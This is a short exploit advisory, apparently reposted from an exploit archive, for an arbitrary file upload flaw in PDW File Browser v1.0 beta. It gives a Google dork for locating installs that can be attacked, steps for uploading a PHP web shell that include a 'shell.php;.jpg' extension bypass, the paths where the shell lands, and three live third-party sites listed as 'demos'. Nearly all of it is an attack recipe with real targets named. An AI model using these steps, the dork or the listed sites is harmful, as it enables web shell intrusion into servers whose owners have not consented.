id: 19986
date: 12/15/2012
title: PDW File Browser v1.0 beta Arbitrary File Upload Vulnerability
author: Zikou-16
cves: 

-------------------------------------------------------------------------------
         pdw file browser Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------
 

#####
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"pdw_file_browser"
#
# Tested on : Windows 7 , Backtrack 5r3 
####

Exploit :

Go to => http://localhost/pdw_file_browser/  => Upload => Browse...

& upload your shell => shell.php or try with shell.php;.jpg

your shell : 4 example => Currently uploading in folder: /pdw_file_browser/img/
                       => http://localhost/pdw_file_browser/img/shell.php
                       => http://localhost/pdw_file_browser/img/shell.php;.jpg

------------------------------

[#] Demos :

http://www.peterkiss.com/pdw_file_browser/
http://blueskybrokers.org/pdw_file_browser/
http://www.hss.ed.ac.uk/web-team/test/editpage/pdw_file_browser/

------------------------------ The End

#  0day.today [2023-03-22]  #